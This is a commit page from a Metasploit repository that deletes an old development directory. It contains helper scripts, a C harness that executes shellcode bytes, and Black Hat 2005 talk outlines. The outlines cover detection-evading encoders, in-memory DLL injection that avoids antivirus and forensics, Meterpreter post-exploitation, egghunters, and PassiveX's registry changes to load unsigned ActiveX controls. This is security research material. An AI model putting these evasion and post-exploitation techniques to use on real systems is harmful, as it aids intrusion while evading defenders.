dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Nuke the old/obsolete dev directory 

git-svn-id: file:///home/svn/framework3/trunk@5960 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2008-11-19 07:15:44 +00:00
parent 412e4a27ef
commit 70be992586
179 changed files with 0 additions and 54053 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
dev/add_standard_header.rb
View File

@ -1,32 +0,0 @@
#!/usr/bin/env ruby
banner =
%q{##
# $Id:$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
}
mod = ARGV.shift
data = File.read(mod)
if (data =~ /This file is part of the Metasploit/) {
exit(0)
}
fd = File.open(mod, 'w')
fd.write(banner)
fd.write(data)
fd.close
system("svn propset svn:keywords 'Rev Revision Id Header' #{mod}")

39
dev/adminy/movey.pl
View File

@ -1,39 +0,0 @@
#/usr/bin/perl
use strict;
die if @ARGV != 1;
move($ARGV[0]);
sub old_to_new {
my $name = shift;
$name =~ s/^([A-Z])/lc($1)/ge;
$name =~ s/([A-Z])/"_" . lc($1)/ge;
return($name);
}
sub move {
my $dir = shift;
my @entries;
opendir(DIR, $dir) || die "Can't open $dir: $!\n";
@entries = readdir(DIR);
closedir(DIR);
foreach my $entry (@entries) {
next if($entry eq 'Attic' || $entry =~ /^\./);
my $path = $dir . '/' . $entry;
my $newpath = $dir . '/' . old_to_new($entry);
if(-d $path) {
move($path);
}
print "$path -> $newpath\n";
rename($path, $newpath) || die("BAH!");
}
}

27
dev/adminy/movey_requires.pl
View File

@ -1,27 +0,0 @@
#!/usr/bin/perl -pi
use strict;
s/require '(.*?)'/"require '" . waka($1) . "'"/ge;
sub waka {
my $required = shift;
my @pieces = split('/', $required);
map { $_ = old_to_new($_) } @pieces;
my $new = join('/', @pieces);
return $new;
}
sub old_to_new {
my $name = shift;
if(uc($name) eq $name) {
return(lc($name));
}
$name =~ s/^([A-Z])/lc($1)/ge;
$name =~ s/([A-Z])/"_" . lc($1)/ge;
return($name);
}

48
dev/aux_design.txt
View File

@ -1,48 +0,0 @@
Auxiliary Module Design
-----------------------
The goal of this document is to define the requirements and basic
implementation of Metasploit v3.0 Auxiliary Modules. Auxiliary modules have a
unique role in the Framework in that they can do just about anything.
Auxiliary modules work similar to exploits, in that the user selects a module,
configures, and launches it, but differs in that they do not execute arbitrary
code on target systems.
Design Goals
------------
Auxiliary modules should be capable of performing reconnaisance activities,
such as sending probes or listening to the network, and exporting the data
into a persistent storage system accessible to the rest of the Framework. Not
all auxiliary modules produce this type of data, some may perform intrusive
actions, such as file retrieval or modifying access credentials.
An Auxiliary module has the ability to define new commands and then process
these commands. Any user interface that sypports Auxiliary modules needs to
take into account this fact and allow these optional commands to be accessed.
Unlike exploits, auxiliary modules do not use Targets, instead they support
what we call Actions. An Action is an option, that when set, causes the
auxiliary module to perform a selected task. Between the extensible command
set and the Actions system, a single auxiliary module is capable performing an
almost infinite number of tasks.
An example would be a module that performs various tasks against a Microsoft
SQL Server. This module would only support the default command of 'run', but
could allow the user to send a UDP probe and display the data, perform an
account brute force, or scan all open ports for an exposed MSSQL DCERPC
interface.
Storage
-------
Requirements
------------

75
dev/contrib/MSF_nolimit.bugtraq@gmail.com.txt
View File

@ -1,75 +0,0 @@
From nolimit.bugtraq@gmail.com Sun Jan 22 16:40:09 2006
From nolimit.bugtraq@gmail.com Sun Jan 22 22:39:35 2006
Return-Path: <nolimit.bugtraq@gmail.com>
X-Spam-Checker-Version: SpamAssassin 3.1.0-gr0 (2005-09-13) on sugar.14x.net
X-Spam-Level:
X-Spam-Status: No, score=-2.1 required=5.0 tests=BAYES_00,HTML_40_50,
HTML_MESSAGE autolearn=ham version=3.1.0-gr0
Delivered-To: hdm-hdm@metasploit.com
Received: (qmail 8349 invoked from network); 22 Jan 2006 16:39:35 -0600
Received: from unknown (HELO uproxy.gmail.com) (66.249.92.203)
by sugar.14x.net with SMTP; 22 Jan 2006 16:39:35 -0600
Received: by uproxy.gmail.com with SMTP id j3so504335ugf
for <hdm@metasploit.com>; Sun, 22 Jan 2006 14:40:09 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=beta; d=gmail.com;
h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
b=FBG7YV3XXWeZisoQR5v8dxhWbwA/m0bXqv9oL5+jChFGrjP4k1cR2k8HdCygCpy1yJQoMLwlbPNVtdUkYMAoFg+fTTRDbZiiM8XQtidhcaM41Hbep60wkSBX8UemqRSLFaX0fRqiNDkHrAyEkVZOedxEwEzy+YYDFeqEiGVWib8=
Received: by 10.66.219.19 with SMTP id r19mr1989749ugg;
Sun, 22 Jan 2006 14:40:09 -0800 (PST)
Received: by 10.66.255.7 with HTTP; Sun, 22 Jan 2006 14:40:08 -0800 (PST)
Message-ID: <786b40bf0601221440x27049938h4c4fd527c23b930c@mail.gmail.com>
Date: Sun, 22 Jan 2006 17:40:09 -0500
From: nolimit bugtraq <nolimit.bugtraq@gmail.com>
To: H D Moore <hdm@metasploit.com>
Subject: Re: Metasploit Framework License
In-Reply-To: <200601221520.34147.hdm@metasploit.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_10104_11843058.1137969609003"
References: <200601221520.34147.hdm@metasploit.com>
Status: R
X-Status: NC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:
------=_Part_10104_11843058.1137969609003
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
I give you full rights to use any exploits I've published in the metasploit
framework, and continue to be honored by it.
On 1/22/06, H D Moore <hdm@metasploit.com> wrote:
>
> Hello,
>
> I you are receiving this email, there is a good chance that you
> contributed to the Metasploit Framework sometime in the past.
> Starting with version 3.0, we are changing the licensing terms.
> <CUT>
>
------=_Part_10104_11843058.1137969609003
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
I give you full rights to use any exploits I've published in the metasploit=
framework, and continue to be honored by it. <br><br>
<div><span class=3D"gmail_quote">On 1/22/06, <b class=3D"gmail_sendername">=
H D Moore</b> &lt;<a href=3D"mailto:hdm@metasploit.com">hdm@metasploit.com<=
/a>&gt; wrote:</span>
<blockquote class=3D"gmail_quote" style=3D"PADDING-LEFT: 1ex; MARGIN: 0px 0=
px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">Hello,<br><br>I you are receivin=
g this email, there is a good chance that you<br>contributed to the Metaspl=
oit Framework sometime in the past.
<br>Starting with version 3.0, we are changing the licensing terms.<br>&lt;=
CUT&gt;<br></blockquote></div>
------=_Part_10104_11843058.1137969609003--

55
dev/correlate.rb
View File

@ -1,55 +0,0 @@
#!/usr/local/bin/ruby
if ARGV.empty?
puts "usage: <delta value | t> <files ...>"
exit(1)
end
textmode = false
if ARGV[0] == 't'
ARGV.shift
textmode = true
else
delta = ARGV.shift.to_i
end
first = TRUE
last = [ ]
# simple algorithm, build up a list of all the possible addresses
# calculating the delta range for each address in the file... then
# just do a set intersection across these all and you have your results
ARGV.each do |file|
cur = [ ]
IO.foreach(file) do |line|
if textmode
cur << line
else
addr = line.hex
(-delta .. delta).each do |d|
cur << addr + d
end
end
end
if first
first = FALSE
last = cur
else
last = last & cur
end
end
# print da results
last.each { |l|
if textmode
puts l
else
puts "0x%08x" % l
end
}

202
dev/db/nessus.nbe
View File

File diff suppressed because one or more lines are too long

2
dev/db/test.rc
View File

@ -1,2 +0,0 @@
load db_postgres
exit

7
dev/db/test2.rc
View File

@ -1,7 +0,0 @@
load db_sqlite3
db_create
db_import_nessus_nbe /home/hdm/local.nbe
db_hosts
db_vulns
db_destroy
db_hosts

19
dev/db/test3.rc
View File

@ -1,19 +0,0 @@
load db_sqlite3
use aux/recon
set RHOST 127.0.0.1
set ACTION Probe All Ports
run
sleep 1
db_services
sleep 1
db_services
sleep 1
db_services
sleep 1
db_services
sleep 1
db_services
sleep 1
db_services
sleep 1
db_services

BIN
dev/documentation/devguide/dev_guide_arch_packages.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 10 KiB

BIN
dev/documentation/devguide/dev_guide_payload_hierarchy.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 5.3 KiB

3735
dev/documentation/devguide/developers_guide.tex
View File

File diff suppressed because it is too large Load Diff

BIN
dev/documentation/devguide/logo.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 52 KiB

11
dev/gendoc.sh
View File

@ -1,11 +0,0 @@
OPTS="-x .ut.rb -x .ts.rb -q"
BASE="documentation/api"
echo "Generating rex..."
rdoc $OPTS -t "Rex Documentation" -o $BASE/rex lib/rex
echo "Generating msfcore"
rdoc $OPTS -t "Framework Core Documentation" -o $BASE/msfcore lib/msf/core
echo "Generating msfbase"
rdoc $OPTS -t "Framework Base Documentation" -o $BASE/msfbase lib/msf/base
echo "Generating msfui"
rdoc $OPTS -t "Framework UI Documentation" -o $BASE/msfui lib/msf/ui

2
dev/machinetest/extconf.rb
View File

@ -1,2 +0,0 @@
require 'mkmf'
create_makefile('machinetestinternal')

12
dev/machinetest/machinetest.rb
View File

@ -1,12 +0,0 @@
#!/usr/bin/env ruby
require 'machinetestinternal'
module MachineTest
def MachineTest.test(str, all = false)
MachineTest::Internal.test(str + "\xcc", all)
end
def MachineTest.testraw(str, all = false)
MachineTest::Internal.test(str, all)
end
end

67
dev/machinetest/machinetestinternal.c
View File

@ -1,67 +0,0 @@
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <errno.h>
#include <ruby.h>
#include <signal.h>
#define PAGE_SIZE 0x1000
static VALUE t_test(VALUE self, VALUE str, VALUE all) {
int len = 1, pid, status, i;
char *ptr, *start, *stop;
str = StringValue(str);
/* test all of the string, instead of just from the beginning */
if(all == Qtrue)
len = RSTRING(str)->len;
while(len-- > 0) {
switch(fork()) {
case -1:
perror("fork");
rb_raise(rb_eRuntimeError, "fork failed!");
case 0:
for(i = 0; i < 20; i++) {
signal(i, SIG_DFL);
}
ptr = RSTRING(str)->ptr + len;
start = (char *)((unsigned int)ptr & ~(PAGE_SIZE-1));
stop = (char *)(((unsigned int)(ptr + (RSTRING(str)->len - len)) + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1));
__asm__ __volatile__(
"mov %0, %%eax"
:
: "m"((long)ptr)
: "%eax");
if ((i = mprotect(start, (int)(stop - start), PROT_EXEC|PROT_WRITE|PROT_READ)) != 0)
printf("mprotect failed, %d %d\n", i, errno);
((void (*)(void)) RSTRING(str)->ptr + len)();
exit(1);
default:
wait(&status);
if(!WIFSIGNALED(status) || WTERMSIG(status) != 5) {
return INT2NUM(len);
}
break;
}
}
return Qnil;
}
void Init_machinetestinternal() {
VALUE cTest;
cTest = rb_define_module_under(
rb_define_module("MachineTest"),
"Internal"
);
rb_define_module_function(cTest, "test", t_test, 2);
}

BIN
dev/materials/blackhat05/bh05.pdf
View File

Binary file not shown.

1646
dev/materials/blackhat05/bh05.tex
View File

File diff suppressed because it is too large Load Diff

33
dev/materials/blackhat05/blog.txt
View File

@ -1,33 +0,0 @@
Blog entry, Stardate April, 2005
We have recently been on a new shellcode kick, but this time it's not about
making them smaller. We're currently working on building very power new
post-exploitation shellcode and toolkits, and a very powerful unified API
to expose their functionality. This will allow us to diverge from precanned
payloads, allowing users to quickly build power and portable post-exploitation
tools. We've have built strongly upon our Windows DLL injection, and are
working on extending similar functionality to the land of Unix. We're also
working hard on the next version of Metasploit, which follows this same
philosophy of emedability and extensablity, allowing users to build their own
tools on top of our framework. Our previous work was all about exploit
frameworks. Our new approach we are really building more of a hacker tool
framework, allowing very strong automation and customization.
ignore this.....
With Metasploit 3.0 on the horizon, we've been working hard on design and
building components to take a very different focus. Currently Metasploit 2
is very much an end user tool, and doing anything custom isn't so elegant.
The approach we are taking in Metasploit 3, is "Metasploit as a library". We
are working very hard on writing post-exploitation suites for different
platforms, and then building a unified API that they all adhere to. This will
allow you to directly script remote hosts, proxying file operations, network
communications, and transparent channelized communication. The new system is
being designed to be threadsafe to a high degree, forcing us to rethink and
redesign many of our tools and protocols. Our new system is design to allow
you to do things like run 10 exploits concurrently, all "pivoting" through
a host you previously owned. Along with this new feature set, we are still
concentrating on keeping things off disk, all in-memory injection, etc.

383
dev/materials/blackhat05/outline-new.txt
View File

@ -1,383 +0,0 @@
[12:52:34] -> *spewnum* damn you! :) fine, we'll just call them payloads, and then we'll break it up as Payload Stagers, Payload Stages, and
Post-exploitation suites, does that sound coo?
I. Introduction
A. Who are we?
1. spoonm
2. skape
3. Why do we do this hoodoo voodoo
B. Exploit Technology
1. Three Phases of Exploitation
a. Pre-exploitation
b. Exploitation
c. Post-exploitation
2. Pre-exploitation - Before the attack
a. Find the bug
b. Write exploits, payloads, tools
3. Exploitation - Leveraging the vulnerability
a. Find a target
c. Gather info, setup tools, prepare listeners, etc
b. Launch attack
4. Post-Exploitation - Manipulating the target
a. Command shell redirection
b. Arbitrary command execution
c. Pivoting payloads
d. Advanced payload interaction
B. Where do we stand?
1. Pre-exploitation
a. Robust and elegant encoders do exist
i. SkyLined's alpha-numeric encoder
ii. Spoonm's Shikata Ga Nai
b. Payload encoders generally taken for granted
NOTE: maybe expand a little bit more here...
i. Most encoders are static with a variable key
ii. IDS able to signature static decoder stubs
c. NOP generation hasn't publically changed much
i. PoC exploits generally use predictable nops, if any
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
iii. Not considered very important to many researchers
d. NIDS deployments are playing chase the tail
i. The mouse always has the advantage; NIDS is reactive
ii. Advanced nops and encoders push NIDS to its limits
NOTE: maybe talk about how complex some things are to signature,
for example, RPC, application level fragmentation, etc.
2. Exploitation
a. Techniques have become very mature
i. Linux/BSD exploitation techniques largely unchanged
ii. Win32 heap overflows now more reliable (oded/shok)
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
b. Exploitation topics have been beaten to death
3. Post-exploitation
a. Common payloads are limited
i. Command shell interaction has poor automation support
ii. Limited to the command set that the interpreter provides
iii. Bounded by the utilities installed on the target machine
iv. Restrictive environments (chroot) can hinder command execution
v. HIPS vendors becoming more adept at detecting basic payloads
- LoadLibraryA from the stack, etc (mcafee 8.0i)
NOTE: I think it would be important here to talk even about the
issues with "advantage" payloads, ala Core Impact and CANVAS.
We should look into them more, but I have a hunch that they
aren't that well writte, don't have that great of APIs
exposed, and aren't very extensible for a 3rd party not
on the team authoring the product. Even the "advanced" stuff
I think has a lot of issues.
b. Communication vectors largely unchanged
i. Reverse and port-bind payloads still the most common
ii. Findsock style payloads still unused by PoC exploits
iii. Alternative communication vectors rarely discussed
c. Pivoting technology exists
i. Core ST described system call proxying in 2002
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
C. What will we discuss?
1. Pre-exploitation Research
a. NOP generation
i. Opty2
b. Encoders
i. Additive feedback encoders
ii. Shikata Ga Nai
2. Post-Exploitation Research
a. Library Injection
i. Facilitates things like Meterpreter and VNC injection
b. VNC Injection
i. Introduced at blackhat04 with the Metasploit 2.2 release
c. Meterpreter & dN
i. The cross-platform post-exploitation suite
NOTE: dN is weak, but maybe talk about it from a different perspective,
just about allowing the attacker to really orcistrate everything
down even to the system call level. Definitely should talk a
bunch about your ninjaness with meterp TLV stylies, and the
channelized throwdown. (</thuggin>).
3. Payload Research
a. PassiveX
i. Taking advantage of ActiveX controls
ii. Taking advantage of soccer playing sisters.
b. Ordinal Stagers
i. Tiny network capable stagers
c. Egghunt (maybe?)
i. Small payload capable of locating a larger payload
ii. Useful for exploits with limited space
NOTE: Egghunt is cool, and we can just talk a bit about how we
extracted the syscalls, and how all of our tools come together
to do stuff like that really fast/easily. Oded mentioned he
saw the page and thought it was cool, he wondered how you
got the prototypes...
II. Pre-exploitation
A. OptyNop2
1. Creation and benefits of multi-byte nopsleds
B. Additive feedback encoders
C. Shikata Ga Nai
1. High permutation shellcode through simple dependency mappings
III. Post-exploitation
A. Library Injection
1. Overview
a. Paper published in 04/2004
b. Provides advanced code execution
c. Code can be written in any language that can compile down
to a shared object.
d. Allows developer to use all of the APIs exposed to a normal
application.
e. Detailed explanation can be found in included resources
(include lib inject paper)
2. Two types of library injection
a. On-Disk
i. Library is loaded from the target's harddrive or via a
file share.
ii. Can be detected by AV products due to fs access
b. In-Memory
i. Library is uploaded to the target and loaded from memory
without touching the disk
ii. Evades file system filter drivers, such as those
provided by AV companies
iii. Not touching the disk means no forensic trace
iv. VirtualLock prevents swapping to disk, but requires admin
3. In-memory library injection on Windows
a. System calls used by the library loader are hooked
i. NtCreateFile
ii. NtMapViewOfSection
iii. etc
b. Unique image name is used to identify the image to image that
is in memory
c. System call hooks are removed so that future injectino can
occur
d. Alternative approaches
i. Could do client-side relocations, but would need to handle
import processing
4. In-memory library injection on Linux/BSD
a. No known public implementations
b. Requires alternate approach
i. Hooking API routines not always possible -- symtab not
mapped into memory
ii. libc symbol version mismatches lead to linking nightmares
c. Client-side relocations seem most feasible
i. Remote side maps a region of memory and sends the client
the base address
ii. Client processes relocations and transmits the relocated
image as its mapped segment would appear
iii. Requires locating rtld base so that PLT lookups will
work
B. VNC Injection
1. Implements VNC as an injectable DLL
a. Uses RealVNC as the code-base
b. VNC communication uses the exploit connection
c. No physical trace is left of the VNC server
d. Can operate regardless of existing VNC installations
2. Easy way to illustrate insecurities
a. Suits understand mouse movement better than black box command
prompts
C. Meterpreter
1. Generic post-exploitation suite
a. Based on library injection
b. Uses the established exploit connection
i. Especially powerful with findsock payloads; no new connection
c. Executes entirely from memory
d. No new processes or file access required for the payload to
succeed
e. Detailed explanation can be found in included resources
(include meterpreter paper)
2. Extension system provides advanced automation support
a. No need to hand write tedious assembly
b. Existing native code can be ported to a meterpreter extension
3. Architecture
a. Design goals
i. Very flexible protocol; should adapt to extension requirements
ii. Exposure of a channelized communication system to extensions
iii. Stealth operation
iv. Should be portable to various operating systems
v. Client from one platform should work with server on another
platform
b. Protocol
i. Uses TLVs (Type-Length-Value) to support arbitrary data
passing.
ii. TLVs allow the packet parser to be oblivious to the structure
of the value field
iii. Type field is broken down into meta types
4. Core interface
a. Overview
i. Minimal interface to support the loading of extensions
ii. Implements the basic packet transmission and dispatching
facilities
iii. Exposes channel allocation and management to extensions
b. Advanced features
i. Migrating the server instance between processes
5. The ``stdapi'' extension
a. Overview
i. Included in Metasploit 3.0
ii. Provides access to some of the common subsystems of the
target operating system
iii. Allows for easy automation and implementation of robust
post-exploitation scripts
b. File System
i. File and directory interaction
ii. Files can be uploaded and downloaded between the
attacker and the target
c. Network
i. Transparent network pivoting
ii. Route table enumeration and manipulation
iii. Local interface enumeration
d. Process
i. Process execution, optionally with channelized IO
ii. Enumeration of running processes
iii. Modification of arbitrary memory
iv. Creation and modification of running threads
v. Loading and interacting with shared object files
e. Registry
i. General registry API access
ii. Opening, creating, and removing registry keys
iii. Setting, querying, and deleting registry values
iv. Enumeration of both keys and values
f. User interface
i. Disabling local user interaction via the keyboard
and/or mouse (similar to VNC)
ii. Idle timeout checking to see how long it's been
since the user did something interactive
6. The ``priv'' extension
a. Still in development
b. Exposes an interface to escalating local privileges
through local vulnerabilities
c. SAM dumping support similar to pwdump3
D. dN
1. Simple low-footprint post-exploitation tool
2. Useful to scope out execution enviroment, then bootstrap other tools
IV. Payload Research
A. PassiveX
1. Overview
a. Post-exploitation payload
b. A derivative of On-Disk library injection that uses
ActiveX controls
c. Supports arbitrary DLL injection in any language that can
be compiled as an ActiveX control (C++, VB, etc)
d. Detailed analysis can be found in included resources
(include passivex paper)
2. Payload Implementation
a. Disables iexplore Internet zone restrictions on
ActiveX controls
i. Modifies four registry values that are stored per-user
b. Launches a hidden iexplore at a URL with an embedded
OCX
i. The OCX does not have to be signed
ii. No user interaction is required
iii. OCX is automatically downloaded, registered, and loaded
into the browser's context
3. Sample HTTP tunneling ActiveX control
a. HTTP GET/POST used to build tunnel to attacker
i. Uses the WININET API
ii. Outbound traffic from target machine encapsulated in POST
request
iii. Inbound traffic from attacker encapsulated in GET response
iv. Proxy configuration automatically inherited
v. Requires HTTP server capable of performing encap/decap on the
HTTP packets
b. Streaming connection through HTTP tunnel can be created
i. socketpair doesn't exist natively on win32 but can be simulated
with a local listener
ii. Streaming abstraction allows advanced payloads to transparently
use the HTTP transport (Meterpreter, VNC)
iii. Local listener less covert, but highly beneficial
4. Pros
a. Bypasses restrictive outbound filters
b. Re-uses proxy configuration
c. Looks like normal user traffic
d. Allows full access to the win32 API like all forms of
library injection
5. Cons
a. Touches the disk
b. Requires administrative access
i. Internet Explorer prohibits the downloading of
ActiveX controls as non-admin
B. Windows Ordinal Stagers
1. Overview
a. Technique from Oded's lightning talk from core04
b. Uses static ordinals to locate winsock symbol addresses
c. Compatible with all versions of Windows
d. 92 byte reverse stager, 93 byte findsock stager
e. Detailed explanation can be found in included resources
(include spoonm ordinal paper)
2. Reverse Ordinal Stager
a. Walks InitOrderModuleList searching for ws2_32
b. Uses static ordinals to index the export table
c. Creates fd with socket
d. Chains connect and recv frames
e. Returns into buffer read in from file descriptor
C. Egghunting
1. Overview
a. Small stub payload that can search for a larger payload
b. Useful for exploits that have limited payload space but can
stash more payload elsewhere in memory
c. Example exploits include the IE object type vulnerability.
d. Goal is to safely search target address space for the larger
payload.
e. Larger payload is located by searching for an egg that is prepended
to it.
f. Detailed analysis can be found in included resources
(include egghunt paper)
2. Two primary methods of egghunting on Windows
a. SEH
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
versions of Windows (including 9x)
2. Installs a custom exception handler
3. Begins walking the address space
i. When a bad address is encounter, the current pointer is
incremented by PAGE_SIZE
ii. When a mismatch of the egg is encountered, the current pointer
is incremented by one
4. Each address is compared against the 8-byte egg
i. Bad addresses will throw exceptions which will be handled
by the custom exception handler
5. When the egg is found, jump past the egg into the larger payload
b. System call
1. Very small stub (32 bytes), searches for an 8 byte egg, only
compatible with NT+
2. Uses a non-intrusive system call (NtDisplayString) to search validate
addresses
i. Same page walking logic as SEH is used
3. When the egg is found, jump past the egg into the larger payload
3. One primary method of egghunting on Linux
a. System call
1. 30 bytes in size, searches for an 8 byte egg
2. System call technique applies to other UNIX variants as well
3. Uses the sigaction system call to validate 16 bytes at once
4. Pros
i. Very small
5. Cons
i. Corner cases may cause it to be unstable
V. The Complete Picture - Metasploit 3.0
A. The power of pre-exploitation prepartion
1. Abstract NOP generation
2. Abstract payload encoding
3. Abstract exploit connection handlers
i. Bind handler
ii. Reverse handler
iii. Findsock handler
B. The power of exploit generalization
1. Standardized exploit creation interface
i. Robust target definitions
ii. Detailed exploit implementation information
iii. Entirely payload independent, no hardcoding paylaods
C. The power of post-exploitation automation
1. Complicated tasks made simple with scripting
i. Want to download a targets entire harddrive?
ii. Want to disable local user interaction?
iii. Want to upload and play an mp3 on the target?
iv. Want to 'be' on the target's network?
2. Standard interface means cross platform support
VI. Conclusion - where do we go from here?
A. Future Post-exploitation research
1. Mesh network support
2. Expansion of the stdapi described in this document
included resources:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
http://www.hick.org/code/skape/papers/meterpreter.pdf
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
http://www.metasploit.com/users/spoonm/ordinals.txt
cited material:
STRIDE:
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
syscall proxy:
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf

378
dev/materials/blackhat05/outline.txt
View File

@ -1,378 +0,0 @@
04/19/2005
Note:
We've tried to include most of the topics that will be covered in our
presentation. However, many of these things will be discussed, but will not be
our main concentration. The majority of our presentation will be around topic
V. C, our new post-exploitation advances, and how they will be designed and
integrated into Metasploit 3. Metasploit 3 won't be finished in time for
Blackhat, but more important than the software itself is the work we've done
on developing the individual components that it will be built from.
This outline is pretty indepth, so it's hard to pick out all the nuggets of
coolness. We've developed many really useful technologies in the area of
payload development. These are things we've created since last year's
Blackhat, including many advances in polymorphic shellcode, and
high-permutation attacks.
I. Introduction
A. Who are we?
1. spoonm
2. skape
B. Exploit Technology
1. Three Phases of Exploitation
a. Pre-exploitation
b. Exploitation
c. Post-exploitation
2. Pre-exploitation - Preparing the payload
a. NOP generation
b. Payload encoders
c. Connection handler initialization
3. Exploitation - Leveraging the vulnerability
a. Stack overflows
c. Heap overflows
b. SEH overwrites
d. Arbitrary pointer overwrites
4. Post-Exploitation - Manipulating the target
a. Command shell redirection
b. Arbitrary command execution
c. Pivoting payloads
d. Advanced payload interaction
B. Where do we stand?
1. Pre-exploitation
a. Robust and elegant encoders do exist
i. SkyLined's alpha-numeric encoder
ii. Spoonm's Shikata Ga Nai
b. Payload encoders generally taken for granted
i. Most encoders are static with a variable key
ii. IDS able to signature static decoder stubs
c. NOP generation hasn't publically changed much
i. PoC exploits generally use predictable nops, if any
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
iii. Not considered very important to many researchers
d. NIDS deployments are playing chase the tail
i. The mouse always has the advantage; NIDS is reactive
ii. Advanced nops and encoders push NIDS to its limits
2. Exploitation
a. Techniques have become very mature
i. Linux/BSD exploitation techniques largely unchanged
ii. Win32 heap overflows now more reliable (oded/shok)
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
b. Exploitation topics have been beaten to death
3. Post-exploitation
a. Common payloads are limited
i. Command shell interaction has poor automation support
ii. Limited to the command set that the interpreter provides
iii. Bounded by the utilities installed on the target machine
iv. Restrictive environments (chroot) can hinder command execution
v. HIPS vendors becoming more adept at detecting basic payloads
- LoadLibraryA from the stack, etc (mcafee 8.0i)
b. Communication vectors largely unchanged
i. Reverse and port-bind payloads still the most common
ii. Findsock style payloads still unused by PoC exploits
iii. Alternative communication vectors rarely discussed
c. Pivoting technology exists
i. Core ST described system call proxying in 2002
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
C. What will we discuss?
1. Pre-exploitation Research
a. NOP generation
i. Opty2
b. Encoders
i. Additive feedback encoders
ii. Shikata Ga Nai
2. Post-Exploitation Research
a. Library Injection
i. Facilitates things like Meterpreter and VNC injection
b. VNC Injection
i. Introduced at blackhat04 with the Metasploit 2.2 release
c. Meterpreter & dN
i. The cross-platform post-exploitation suite
3. Payload Research
a. PassiveX
i. Taking advantage of ActiveX controls
b. Ordinal Stagers
i. Tiny network capable stagers
c. Egghunt (maybe?)
i. Small payload capable of locating a larger payload
ii. Useful for exploits with limited space
II. Pre-exploitation
A. OptyNop2
1. Creation and benefits of multi-byte nopsleds
B. Additive feedback encoders
C. Shikata Ga Nai
1. High permutation shellcode through simple dependency mappings
III. Post-exploitation
A. Library Injection
1. Overview
a. Paper published in 04/2004
b. Provides advanced code execution
c. Code can be written in any language that can compile down
to a shared object.
d. Allows developer to use all of the APIs exposed to a normal
application.
e. Detailed explanation can be found in included resources
(include lib inject paper)
2. Two types of library injection
a. On-Disk
i. Library is loaded from the target's harddrive or via a
file share.
ii. Can be detected by AV products due to fs access
b. In-Memory
i. Library is uploaded to the target and loaded from memory
without touching the disk
ii. Evades file system filter drivers, such as those
provided by AV companies
iii. Not touching the disk means no forensic trace
iv. VirtualLock prevents swapping to disk, but requires admin
3. In-memory library injection on Windows
a. System calls used by the library loader are hooked
i. NtCreateFile
ii. NtMapViewOfSection
iii. etc
b. Unique image name is used to identify the image to image that
is in memory
c. System call hooks are removed so that future injectino can
occur
d. Alternative approaches
i. Could do client-side relocations, but would need to handle
import processing
4. In-memory library injection on Linux/BSD
a. No known public implementations
b. Requires alternate approach
i. Hooking API routines not always possible -- symtab not
mapped into memory
ii. libc symbol version mismatches lead to linking nightmares
c. Client-side relocations seem most feasible
i. Remote side maps a region of memory and sends the client
the base address
ii. Client processes relocations and transmits the relocated
image as its mapped segment would appear
iii. Requires locating rtld base so that PLT lookups will
work
B. VNC Injection
1. Implements VNC as an injectable DLL
a. Uses RealVNC as the code-base
b. VNC communication uses the exploit connection
c. No physical trace is left of the VNC server
d. Can operate regardless of existing VNC installations
2. Easy way to illustrate insecurities
a. Suits understand mouse movement better than black box command
prompts
C. Meterpreter
1. Generic post-exploitation suite
a. Based on library injection
b. Uses the established exploit connection
i. Especially powerful with findsock payloads; no new connection
c. Executes entirely from memory
d. No new processes or file access required for the payload to
succeed
e. Detailed explanation can be found in included resources
(include meterpreter paper)
2. Extension system provides advanced automation support
a. No need to hand write tedious assembly
b. Existing native code can be ported to a meterpreter extension
3. Architecture
a. Design goals
i. Very flexible protocol; should adapt to extension requirements
ii. Exposure of a channelized communication system to extensions
iii. Stealth operation
iv. Should be portable to various operating systems
v. Client from one platform should work with server on another
platform
b. Protocol
i. Uses TLVs (Type-Length-Value) to support arbitrary data
passing.
ii. TLVs allow the packet parser to be oblivious to the structure
of the value field
iii. Type field is broken down into meta types
4. Core interface
a. Overview
i. Minimal interface to support the loading of extensions
ii. Implements the basic packet transmission and dispatching
facilities
iii. Exposes channel allocation and management to extensions
b. Advanced features
i. Migrating the server instance between processes
5. The ``stdapi'' extension
a. Overview
i. Included in Metasploit 3.0
ii. Provides access to some of the common subsystems of the
target operating system
iii. Allows for easy automation and implementation of robust
post-exploitation scripts
b. File System
i. File and directory interaction
ii. Files can be uploaded and downloaded between the
attacker and the target
c. Network
i. Transparent network pivoting
ii. Route table enumeration and manipulation
iii. Local interface enumeration
d. Process
i. Process execution, optionally with channelized IO
ii. Enumeration of running processes
iii. Modification of arbitrary memory
iv. Creation and modification of running threads
